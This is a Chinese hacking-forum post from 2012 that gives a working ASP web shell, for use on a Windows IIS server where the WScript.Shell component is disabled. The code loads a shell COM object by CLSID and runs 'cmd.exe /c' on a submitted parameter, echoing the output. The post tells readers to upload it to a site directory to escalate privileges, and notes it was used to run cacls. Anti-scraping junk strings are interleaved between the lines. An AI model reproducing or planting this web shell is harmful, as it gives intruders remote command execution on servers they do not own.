中国网络渗透测试联盟
标题:
wscript.shell删除解决办法
[打印本页]
作者:
admin
时间:
2012-9-15 14:36
标题:
wscript.shell删除解决办法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
( P3 S& R) W/ O% X1 n6 U: T
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
- r' ]. D( q, h5 D! O! w
要想让运行命令可以试试这种方法,成功率为五五之数。
0 C+ e$ Y: A3 K6 |2 G
把下面代码复制:
2 x0 W9 B# w# N5 D8 p/ s, N1 [: K" R
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
P7 r5 R! @) O/ E; G$ P/ x/ A6 y
<%if err then%>
% L- {" P( l5 i9 T, G
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
2 x: [8 U: D0 W4 z' G/ ]' Q
<%
* M* R0 a" v% w/ c: s6 w
end if
. A3 l' O/ `7 J& H( h; H# `7 l, ]) j
response.write("<textarea readonly cols=80 rows=20>")
9 G% C3 Z! M; ]! ?1 M9 F( k4 \
On Error Resume Next
- m3 \& C$ d- \- Z5 F) E
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
. s7 G6 t! T Z6 G2 D+ |- {
response.write("</textarea>")
' @ R$ K0 v0 m* t$ n0 q+ t: R
response.write("<form method='post'>")
' U; E$ `/ g$ q0 o8 U' e; S
response.write("<input type=text name='c' size=60><br>")
: P+ }* Z5 Q% h$ W' s
response.write("<input type=submit value='执行'></form>")
# b9 H4 \9 y( b( V, }+ ^" U& v
%>
5 M2 |% U/ L8 r, |/ A! u2 T. E
8 @2 d4 j n# |+ J2 f' v
保存为一个asp文件,然后传到网站目录上去
2 y4 ~) S3 j3 t1 n2 ?. `5 a4 d
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
# {) V6 q8 c( o$ K
我用此成功运行过cacls命令。
4 { v$ U" x! V# I; @* l1 e
/ _! R& \& M2 g1 J$ q
第二那就是运行时出错,可能限制某些代码执行
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2